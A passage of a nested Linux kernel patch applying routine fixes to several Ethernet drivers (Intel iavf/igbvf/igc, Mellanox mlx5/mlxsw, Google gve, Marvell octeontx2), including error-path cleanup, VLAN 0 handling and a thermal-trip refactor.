++			     TD_DM_DRVP(8) | TD_DM_DRVN(8));
++
++	for (i = 0; i < NUM_TRGMII_CTRL; i++)
++		mt7530_rmw(priv, MT7530_TRGMII_RD(i),
++			   RD_TAP_MASK, RD_TAP(16));
++
+ 	/* Enable port 6 */
+ 	val = mt7530_read(priv, MT7530_MHWTRAP);
+ 	val &= ~MHWTRAP_P6_DIS & ~MHWTRAP_PHY_ACCESS;
+diff --git a/drivers/net/ethernet/google/gve/gve_ethtool.c b/drivers/net/ethernet/google/gve/gve_ethtool.c
+index ce574d097e280..5f81470843b49 100644
+--- a/drivers/net/ethernet/google/gve/gve_ethtool.c
++++ b/drivers/net/ethernet/google/gve/gve_ethtool.c
+@@ -537,7 +537,10 @@ static int gve_get_link_ksettings(struct net_device *netdev,
+ 				  struct ethtool_link_ksettings *cmd)
+ {
+ 	struct gve_priv *priv = netdev_priv(netdev);
+-	int err = gve_adminq_report_link_speed(priv);
++	int err = 0;
++
++	if (priv->link_speed == 0)
++		err = gve_adminq_report_link_speed(priv);
+ 
+ 	cmd->base.speed = priv->link_speed;
+ 	return err;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+index 924f972b91faf..72b091f2509d8 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+@@ -171,10 +171,10 @@ static char *i40e_create_dummy_packet(u8 *dummy_packet, bool ipv4, u8 l4proto,
+ 				      struct i40e_fdir_filter *data)
+ {
+ 	bool is_vlan = !!data->vlan_tag;
+-	struct vlan_hdr vlan;
+-	struct ipv6hdr ipv6;
+-	struct ethhdr eth;
+-	struct iphdr ip;
++	struct vlan_hdr vlan = {};
++	struct ipv6hdr ipv6 = {};
++	struct ethhdr eth = {};
++	struct iphdr ip = {};
+ 	u8 *tmp;
+ 
+ 	if (ipv4) {
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_common.c b/drivers/net/ethernet/intel/iavf/iavf_common.c
+index 34e46a23894f4..43148c07459f8 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_common.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_common.c
+@@ -661,7 +661,7 @@ struct iavf_rx_ptype_decoded iavf_ptype_lookup[BIT(8)] = {
+ 	/* Non Tunneled IPv6 */
+ 	IAVF_PTT(88, IP, IPV6, FRG, NONE, NONE, NOF, NONE, PAY3),
+ 	IAVF_PTT(89, IP, IPV6, NOF, NONE, NONE, NOF, NONE, PAY3),
+-	IAVF_PTT(90, IP, IPV6, NOF, NONE, NONE, NOF, UDP,  PAY3),
++	IAVF_PTT(90, IP, IPV6, NOF, NONE, NONE, NOF, UDP,  PAY4),
+ 	IAVF_PTT_UNUSED_ENTRY(91),
+ 	IAVF_PTT(92, IP, IPV6, NOF, NONE, NONE, NOF, TCP,  PAY4),
+ 	IAVF_PTT(93, IP, IPV6, NOF, NONE, NONE, NOF, SCTP, PAY4),
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 4b09785d2147a..8bbdf66c51f6a 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -893,6 +893,10 @@ static int iavf_vlan_rx_add_vid(struct net_device *netdev,
+ {
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 
++	/* Do not track VLAN 0 filter, always added by the PF on VF init */
++	if (!vid)
++		return 0;
++
+ 	if (!VLAN_FILTERING_ALLOWED(adapter))
+ 		return -EIO;
+ 
+@@ -919,6 +923,10 @@ static int iavf_vlan_rx_kill_vid(struct net_device *netdev,
+ {
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 
++	/* We do not track VLAN 0 filter */
++	if (!vid)
++		return 0;
++
+ 	iavf_del_vlan(adapter, IAVF_VLAN(vid, be16_to_cpu(proto)));
+ 	if (proto == cpu_to_be16(ETH_P_8021Q))
+ 		clear_bit(vid, adapter->vsi.active_cvlans);
+@@ -5069,6 +5077,11 @@ static void iavf_remove(struct pci_dev *pdev)
+ 			mutex_unlock(&adapter->crit_lock);
+ 			break;
+ 		}
++		/* Simply return if we already went through iavf_shutdown */
++		if (adapter->state == __IAVF_REMOVE) {
++			mutex_unlock(&adapter->crit_lock);
++			return;
++		}
+ 
+ 		mutex_unlock(&adapter->crit_lock);
+ 		usleep_range(500, 1000);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_txrx.c b/drivers/net/ethernet/intel/iavf/iavf_txrx.c
+index 18b6a702a1d6d..e989feda133c1 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_txrx.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_txrx.c
+@@ -1096,7 +1096,7 @@ static inline void iavf_rx_hash(struct iavf_ring *ring,
+ 		cpu_to_le64((u64)IAVF_RX_DESC_FLTSTAT_RSS_HASH <<
+ 			    IAVF_RX_DESC_STATUS_FLTSTAT_SHIFT);
+ 
+-	if (ring->netdev->features & NETIF_F_RXHASH)
++	if (!(ring->netdev->features & NETIF_F_RXHASH))
+ 		return;
+ 
+ 	if ((rx_desc->wb.qword1.status_error_len & rss_mask) == rss_mask) {
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+index 365ca0c710c4a..0fea6b9b599fb 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+@@ -2446,8 +2446,6 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 		list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+ 			if (f->is_new_vlan) {
+ 				f->is_new_vlan = false;
+-				if (!f->vlan.vid)
+-					continue;
+ 				if (f->vlan.tpid == ETH_P_8021Q)
+ 					set_bit(f->vlan.vid,
+ 						adapter->vsi.active_cvlans);
+diff --git a/drivers/net/ethernet/intel/ice/ice_sriov.c b/drivers/net/ethernet/intel/ice/ice_sriov.c
+index 3ba1408c56a9a..b3849bc3d4fc6 100644
+--- a/drivers/net/ethernet/intel/ice/ice_sriov.c
++++ b/drivers/net/ethernet/intel/ice/ice_sriov.c
+@@ -1384,15 +1384,15 @@ int ice_set_vf_trust(struct net_device *netdev, int vf_id, bool trusted)
+ 	struct ice_vf *vf;
+ 	int ret;
+ 
++	vf = ice_get_vf_by_id(pf, vf_id);
++	if (!vf)
++		return -EINVAL;
++
+ 	if (ice_is_eswitch_mode_switchdev(pf)) {
+ 		dev_info(ice_pf_to_dev(pf), "Trusted VF is forbidden in switchdev mode\n");
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+-	vf = ice_get_vf_by_id(pf, vf_id);
+-	if (!vf)
+-		return -EINVAL;
+-
+ 	ret = ice_check_vf_ready_for_cfg(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index b5b443883da98..c42584680e56a 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -3841,9 +3841,7 @@ static void igb_remove(struct pci_dev *pdev)
+ 	igb_release_hw_control(adapter);
+ 
+ #ifdef CONFIG_PCI_IOV
+-	rtnl_lock();
+ 	igb_disable_sriov(pdev);
+-	rtnl_unlock();
+ #endif
+ 
+ 	unregister_netdev(netdev);
+diff --git a/drivers/net/ethernet/intel/igbvf/netdev.c b/drivers/net/ethernet/intel/igbvf/netdev.c
+index 3a32809510fc6..72cb1b56e9f24 100644
+--- a/drivers/net/ethernet/intel/igbvf/netdev.c
++++ b/drivers/net/ethernet/intel/igbvf/netdev.c
+@@ -1074,7 +1074,7 @@ static int igbvf_request_msix(struct igbvf_adapter *adapter)
+ 			  igbvf_intr_msix_rx, 0, adapter->rx_ring->name,
+ 			  netdev);
+ 	if (err)
+-		goto out;
++		goto free_irq_tx;
+ 
+ 	adapter->rx_ring->itr_register = E1000_EITR(vector);
+ 	adapter->rx_ring->itr_val = adapter->current_itr;
+@@ -1083,10 +1083,14 @@ static int igbvf_request_msix(struct igbvf_adapter *adapter)
+ 	err = request_irq(adapter->msix_entries[vector].vector,
+ 			  igbvf_msix_other, 0, netdev->name, netdev);
+ 	if (err)
+-		goto out;
++		goto free_irq_rx;
+ 
+ 	igbvf_configure_msix(adapter);
+ 	return 0;
++free_irq_rx:
++	free_irq(adapter->msix_entries[--vector].vector, netdev);
++free_irq_tx:
++	free_irq(adapter->msix_entries[--vector].vector, netdev);
+ out:
+ 	return err;
+ }
+diff --git a/drivers/net/ethernet/intel/igbvf/vf.c b/drivers/net/ethernet/intel/igbvf/vf.c
+index b8ba3f94c3632..a47a2e3e548cf 100644
+--- a/drivers/net/ethernet/intel/igbvf/vf.c
++++ b/drivers/net/ethernet/intel/igbvf/vf.c
+@@ -1,6 +1,8 @@
+ // SPDX-License-Identifier: GPL-2.0
+ /* Copyright(c) 2009 - 2018 Intel Corporation. */
+ 
++#include <linux/etherdevice.h>
++
+ #include "vf.h"
+ 
+ static s32 e1000_check_for_link_vf(struct e1000_hw *hw);
+@@ -131,11 +133,16 @@ static s32 e1000_reset_hw_vf(struct e1000_hw *hw)
+ 		/* set our "perm_addr" based on info provided by PF */
+ 		ret_val = mbx->ops.read_posted(hw, msgbuf, 3);
+ 		if (!ret_val) {
+-			if (msgbuf[0] == (E1000_VF_RESET |
+-					  E1000_VT_MSGTYPE_ACK))
++			switch (msgbuf[0]) {
++			case E1000_VF_RESET | E1000_VT_MSGTYPE_ACK:
+ 				memcpy(hw->mac.perm_addr, addr, ETH_ALEN);
+-			else
++				break;
++			case E1000_VF_RESET | E1000_VT_MSGTYPE_NACK:
++				eth_zero_addr(hw->mac.perm_addr);
++				break;
++			default:
+ 				ret_val = -E1000_ERR_MAC_INIT;
++			}
+ 		}
+ 	}
+ 
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 1dd2a7fee8d46..bcd62b36fd7a7 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -6007,18 +6007,18 @@ static bool validate_schedule(struct igc_adapter *adapter,
+ 		if (e->command != TC_TAPRIO_CMD_SET_GATES)
+ 			return false;
+ 
+-		for (i = 0; i < adapter->num_tx_queues; i++) {
+-			if (e->gate_mask & BIT(i))
++		for (i = 0; i < adapter->num_tx_queues; i++)
++			if (e->gate_mask & BIT(i)) {
+ 				queue_uses[i]++;
+ 
+-			/* There are limitations: A single queue cannot be
+-			 * opened and closed multiple times per cycle unless the
+-			 * gate stays open. Check for it.
+-			 */
+-			if (queue_uses[i] > 1 &&
+-			    !(prev->gate_mask & BIT(i)))
+-				return false;
+-		}
++				/* There are limitations: A single queue cannot
++				 * be opened and closed multiple times per cycle
++				 * unless the gate stays open. Check for it.
++				 */
++				if (queue_uses[i] > 1 &&
++				    !(prev->gate_mask & BIT(i)))
++					return false;
++			}
+ 	}
+ 
+ 	return true;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+index 7f8ffbf79cf74..ab126f8706c74 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+@@ -709,6 +709,7 @@ err_unreg_netdev:
+ err_ptp_destroy:
+ 	otx2_ptp_destroy(vf);
+ err_detach_rsrc:
++	free_percpu(vf->hw.lmt_info);
+ 	if (test_bit(CN10K_LMTST, &vf->hw.cap_flag))
+ 		qmem_free(vf->dev, vf->dync_lmt);
+ 	otx2_detach_resources(&vf->mbox);
+@@ -762,6 +763,7 @@ static void otx2vf_remove(struct pci_dev *pdev)
+ 	otx2_shutdown_tc(vf);
+ 	otx2vf_disable_mbox_intr(vf);
+ 	otx2_detach_resources(&vf->mbox);
++	free_percpu(vf->hw.lmt_info);
+ 	if (test_bit(CN10K_LMTST, &vf->hw.cap_flag))
+ 		qmem_free(vf->dev, vf->dync_lmt);
+ 	otx2vf_vfaf_mbox_destroy(vf);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+index f84f1cfcddb85..25202ceaa7d2f 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+@@ -1412,6 +1412,7 @@ static int macsec_aso_query(struct mlx5_core_dev *mdev, struct mlx5e_macsec *mac
+ 	struct mlx5e_macsec_aso *aso;
+ 	struct mlx5_aso_wqe *aso_wqe;
+ 	struct mlx5_aso *maso;
++	unsigned long expires;
+ 	int err;
+ 
+ 	aso = &macsec->aso;
+@@ -1425,7 +1426,13 @@ static int macsec_aso_query(struct mlx5_core_dev *mdev, struct mlx5e_macsec *mac
+ 	macsec_aso_build_wqe_ctrl_seg(aso, &aso_wqe->aso_ctrl, NULL);
+ 
+ 	mlx5_aso_post_wqe(maso, false, &aso_wqe->ctrl);
+-	err = mlx5_aso_poll_cq(maso, false);
++	expires = jiffies + msecs_to_jiffies(10);
++	do {
++		err = mlx5_aso_poll_cq(maso, false);
++		if (err)
++			usleep_range(2, 10);
++	} while (err && time_is_after_jiffies(expires));
++
+ 	if (err)
+ 		goto err_out;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_dcbnl.c b/drivers/net/ethernet/mellanox/mlx5/core/en_dcbnl.c
+index 2449731b7d79a..89de92d064836 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_dcbnl.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_dcbnl.c
+@@ -117,12 +117,14 @@ static int mlx5e_dcbnl_ieee_getets(struct net_device *netdev,
+ 	if (!MLX5_CAP_GEN(priv->mdev, ets))
+ 		return -EOPNOTSUPP;
+ 
+-	ets->ets_cap = mlx5_max_tc(priv->mdev) + 1;
+-	for (i = 0; i < ets->ets_cap; i++) {
++	for (i = 0; i < IEEE_8021QAZ_MAX_TCS; i++) {
+ 		err = mlx5_query_port_prio_tc(mdev, i, &ets->prio_tc[i]);
+ 		if (err)
+ 			return err;
++	}
+ 
++	ets->ets_cap = mlx5_max_tc(priv->mdev) + 1;
++	for (i = 0; i < ets->ets_cap; i++) {
+ 		err = mlx5_query_port_tc_group(mdev, i, &tc_group[i]);
+ 		if (err)
+ 			return err;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index d6bcbc17151d7..47d4b54d15634 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -4094,8 +4094,12 @@ static netdev_features_t mlx5e_fix_features(struct net_device *netdev,
+ 		}
+ 	}
+ 
+-	if (mlx5e_is_uplink_rep(priv))
++	if (mlx5e_is_uplink_rep(priv)) {
+ 		features = mlx5e_fix_uplink_rep_features(netdev, features);
++		features |= NETIF_F_NETNS_LOCAL;
++	} else {
++		features &= ~NETIF_F_NETNS_LOCAL;
++	}
+ 
+ 	mutex_unlock(&priv->state_lock);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c
+index a994e71e05c11..db578a7e7008a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c
+@@ -364,8 +364,7 @@ int mlx5_esw_acl_ingress_vport_bond_update(struct mlx5_eswitch *esw, u16 vport_n
+ 
+ 	if (WARN_ON_ONCE(IS_ERR(vport))) {
+ 		esw_warn(esw->dev, "vport(%d) invalid!\n", vport_num);
+-		err = PTR_ERR(vport);
+-		goto out;
++		return PTR_ERR(vport);
+ 	}
+ 
+ 	esw_acl_ingress_ofld_rules_destroy(esw, vport);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+index 9daf55e90367b..c8b978014f2c0 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+@@ -959,6 +959,7 @@ void mlx5_esw_vport_disable(struct mlx5_eswitch *esw, u16 vport_num)
+ 	 */
+ 	esw_vport_change_handle_locked(vport);
+ 	vport->enabled_events = 0;
++	esw_apply_vport_rx_mode(esw, vport, false, false);
+ 	esw_vport_cleanup(esw, vport);
+ 	esw->enabled_vports--;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index 3992bf6337ca0..0facc709f0e74 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -3518,6 +3518,18 @@ static int esw_inline_mode_to_devlink(u8 mlx5_mode, u8 *mode)
+ 	return 0;
+ }
+ 
++static bool esw_offloads_devlink_ns_eq_netdev_ns(struct devlink *devlink)
++{
++	struct net *devl_net, *netdev_net;
++	struct mlx5_eswitch *esw;
++
++	esw = mlx5_devlink_eswitch_get(devlink);
++	netdev_net = dev_net(esw->dev->mlx5e_res.uplink_netdev);
++	devl_net = devlink_net(devlink);
++
++	return net_eq(devl_net, netdev_net);
++}
++
+ int mlx5_devlink_eswitch_mode_set(struct devlink *devlink, u16 mode,
+ 				  struct netlink_ext_ack *extack)
+ {
+@@ -3532,6 +3544,13 @@ int mlx5_devlink_eswitch_mode_set(struct devlink *devlink, u16 mode,
+ 	if (esw_mode_from_devlink(mode, &mlx5_mode))
+ 		return -EINVAL;
+ 
++	if (mode == DEVLINK_ESWITCH_MODE_SWITCHDEV &&
++	    !esw_offloads_devlink_ns_eq_netdev_ns(devlink)) {
++		NL_SET_ERR_MSG_MOD(extack,
++				   "Can't change E-Switch mode to switchdev when netdev net namespace has diverged from the devlink's.");
++		return -EPERM;
++	}
++
+ 	mlx5_lag_disable_change(esw->dev);
+ 	err = mlx5_esw_try_lock(esw);
+ 	if (err < 0) {
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c b/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c
+index 987fe5c9d5a36..09ed6e5fa6c34 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c
+@@ -36,33 +36,39 @@ enum mlxsw_thermal_trips {
+ 	MLXSW_THERMAL_TEMP_TRIP_HOT,
+ };
+ 
+-struct mlxsw_thermal_trip {
+-	int	type;
+-	int	temp;
+-	int	hyst;
++struct mlxsw_cooling_states {
+ 	int	min_state;
+ 	int	max_state;
+ };
+ 
+-static const struct mlxsw_thermal_trip default_thermal_trips[] = {
++static const struct thermal_trip default_thermal_trips[] = {
+ 	{	/* In range - 0-40% PWM */
+ 		.type		= THERMAL_TRIP_ACTIVE,
+-		.temp		= MLXSW_THERMAL_ASIC_TEMP_NORM,
+-		.hyst		= MLXSW_THERMAL_HYSTERESIS_TEMP,
+-		.min_state	= 0,
+-		.max_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
++		.temperature	= MLXSW_THERMAL_ASIC_TEMP_NORM,
++		.hysteresis	= MLXSW_THERMAL_HYSTERESIS_TEMP,
+ 	},
+ 	{
+ 		/* In range - 40-100% PWM */
+ 		.type		= THERMAL_TRIP_ACTIVE,
+-		.temp		= MLXSW_THERMAL_ASIC_TEMP_HIGH,
+-		.hyst		= MLXSW_THERMAL_HYSTERESIS_TEMP,
+-		.min_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
+-		.max_state	= MLXSW_THERMAL_MAX_STATE,
++		.temperature	= MLXSW_THERMAL_ASIC_TEMP_HIGH,
++		.hysteresis	= MLXSW_THERMAL_HYSTERESIS_TEMP,
+ 	},
+ 	{	/* Warning */
+ 		.type		= THERMAL_TRIP_HOT,
+-		.temp		= MLXSW_THERMAL_ASIC_TEMP_HOT,
++		.temperature	= MLXSW_THERMAL_ASIC_TEMP_HOT,
++	},
++};
++
++static const struct mlxsw_cooling_states default_cooling_states[] = {
++	{
++		.min_state	= 0,
++		.max_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
++	},
++	{
++		.min_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
++		.max_state	= MLXSW_THERMAL_MAX_STATE,
++	},
++	{
+ 		.min_state	= MLXSW_THERMAL_MAX_STATE,
+ 		.max_state	= MLXSW_THERMAL_MAX_STATE,
+ 	},
+@@ -78,7 +84,8 @@ struct mlxsw_thermal;
+ struct mlxsw_thermal_module {
+ 	struct mlxsw_thermal *parent;
+ 	struct thermal_zone_device *tzdev;
+-	struct mlxsw_thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
++	struct thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
++	struct mlxsw_cooling_states cooling_states[MLXSW_THERMAL_NUM_TRIPS];
+ 	int module; /* Module or gearbox number */
+ 	u8 slot_index;
+ };
+@@ -98,8 +105,8 @@ struct mlxsw_thermal {
+ 	struct thermal_zone_device *tzdev;
+ 	int polling_delay;
+ 	struct thermal_cooling_device *cdevs[MLXSW_MFCR_PWMS_MAX];
+-	u8 cooling_levels[MLXSW_THERMAL_MAX_STATE + 1];
+-	struct mlxsw_thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
++	struct thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
++	struct mlxsw_cooling_states cooling_states[MLXSW_THERMAL_NUM_TRIPS];
+ 	struct mlxsw_thermal_area line_cards[];
+ };
+ 
+@@ -136,9 +143,9 @@ static int mlxsw_get_cooling_device_idx(struct mlxsw_thermal *thermal,
+ static void
+ mlxsw_thermal_module_trips_reset(struct mlxsw_thermal_module *tz)
+ {
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temp = 0;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temp = 0;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temp = 0;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temperature = 0;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temperature = 0;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temperature = 0;
+ }
+ 
+ static int
+@@ -180,12 +187,12 @@ mlxsw_thermal_module_trips_update(struct device *dev, struct mlxsw_core *core,
+ 	 * by subtracting double hysteresis value.
+ 	 */
+ 	if (crit_temp >= MLXSW_THERMAL_MODULE_TEMP_SHIFT)
+-		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temp = crit_temp -
++		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temperature = crit_temp -
+ 					MLXSW_THERMAL_MODULE_TEMP_SHIFT;
+ 	else
+-		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temp = crit_temp;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temp = crit_temp;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temp = emerg_temp;
++		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temperature = crit_temp;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temperature = crit_temp;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temperature = emerg_temp;
+ 
+ 	return 0;
+ }
+@@ -202,11 +209,11 @@ static int mlxsw_thermal_bind(struct thermal_zone_device *tzdev,
+ 		return 0;
+ 
+ 	for (i = 0; i < MLXSW_THERMAL_NUM_TRIPS; i++) {
+-		const struct mlxsw_thermal_trip *trip = &thermal->trips[i];
++		const struct mlxsw_cooling_states *state = &thermal->cooling_states[i];
+ 
+ 		err = thermal_zone_bind_cooling_device(tzdev, i, cdev,
+-						       trip->max_state,
+-						       trip->min_state,
++						       state->max_state,
++						       state->min_state,
+ 						       THERMAL_WEIGHT_DEFAULT);
+ 		if (err < 0) {
+ 			dev_err(dev, "Failed to bind cooling device to trip %d\n", i);
+@@ -260,61 +267,6 @@ static int mlxsw_thermal_get_temp(struct thermal_zone_device *tzdev,
+ 	return 0;
+ }
+ 
+-static int mlxsw_thermal_get_trip_type(struct thermal_zone_device *tzdev,
+-				       int trip,
+-				       enum thermal_trip_type *p_type)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	*p_type = thermal->trips[trip].type;
+-	return 0;
+-}
+-
+-static int mlxsw_thermal_get_trip_temp(struct thermal_zone_device *tzdev,
+-				       int trip, int *p_temp)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	*p_temp = thermal->trips[trip].temp;
+-	return 0;
+-}
+-
+-static int mlxsw_thermal_set_trip_temp(struct thermal_zone_device *tzdev,
+-				       int trip, int temp)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	thermal->trips[trip].temp = temp;
+-	return 0;
+-}
+-
+-static int mlxsw_thermal_get_trip_hyst(struct thermal_zone_device *tzdev,
+-				       int trip, int *p_hyst)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	*p_hyst = thermal->trips[trip].hyst;
+-	return 0;
+-}
+-
+-static int mlxsw_thermal_set_trip_hyst(struct thermal_zone_device *tzdev,
+-				       int trip, int hyst)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	thermal->trips[trip].hyst = hyst;
+-	return 0;
+-}
+-
+ static struct thermal_zone_params mlxsw_thermal_params = {
+ 	.no_hwmon = true,
+ };
+@@ -323,11 +275,6 @@ static struct thermal_zone_device_ops mlxsw_thermal_ops = {
+ 	.bind = mlxsw_thermal_bind,
+ 	.unbind = mlxsw_thermal_unbind,
+ 	.get_temp = mlxsw_thermal_get_temp,
+-	.get_trip_type	= mlxsw_thermal_get_trip_type,
+-	.get_trip_temp	= mlxsw_thermal_get_trip_temp,
+-	.set_trip_temp	= mlxsw_thermal_set_trip_temp,
+-	.get_trip_hyst	= mlxsw_thermal_get_trip_hyst,
+-	.set_trip_hyst	= mlxsw_thermal_set_trip_hyst,
+ };
+ 
+ static int mlxsw_thermal_module_bind(struct thermal_zone_device *tzdev,
+@@ -342,11 +289,11 @@ static int mlxsw_thermal_module_bind(struct thermal_zone_device *tzdev,
+ 		return 0;
+ 
+ 	for (i = 0; i < MLXSW_THERMAL_NUM_TRIPS; i++) {
+-		const struct mlxsw_thermal_trip *trip = &tz->trips[i];
++		const struct mlxsw_cooling_states *state = &tz->cooling_states[i];
+ 
+ 		err = thermal_zone_bind_cooling_device(tzdev, i, cdev,
+-						       trip->max_state,
+-						       trip->min_state,
++						       state->max_state,
++						       state->min_state,
+ 						       THERMAL_WEIGHT_DEFAULT);
+ 		if (err < 0)
+ 			goto err_thermal_zone_bind_cooling_device;
+@@ -434,74 +381,10 @@ static int mlxsw_thermal_module_temp_get(struct thermal_zone_device *tzdev,
+ 	return 0;
+ }
+ 
+-static int
+-mlxsw_thermal_module_trip_type_get(struct thermal_zone_device *tzdev, int trip,
+-				   enum thermal_trip_type *p_type)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	*p_type = tz->trips[trip].type;
+-	return 0;
+-}
+-
+-static int
+-mlxsw_thermal_module_trip_temp_get(struct thermal_zone_device *tzdev,
+-				   int trip, int *p_temp)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	*p_temp = tz->trips[trip].temp;
+-	return 0;
+-}
+-
+-static int
+-mlxsw_thermal_module_trip_temp_set(struct thermal_zone_device *tzdev,
+-				   int trip, int temp)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	tz->trips[trip].temp = temp;
+-	return 0;
+-}
+-
+-static int
+-mlxsw_thermal_module_trip_hyst_get(struct thermal_zone_device *tzdev, int trip,
+-				   int *p_hyst)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	*p_hyst = tz->trips[trip].hyst;
+-	return 0;
+-}
+-
+-static int
+-mlxsw_thermal_module_trip_hyst_set(struct thermal_zone_device *tzdev, int trip,
+-				   int hyst)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	tz->trips[trip].hyst = hyst;
+-	return 0;
+-}
+-
+ static struct thermal_zone_device_ops mlxsw_thermal_module_ops = {
+ 	.bind		= mlxsw_thermal_module_bind,
+ 	.unbind		= mlxsw_thermal_module_unbind,
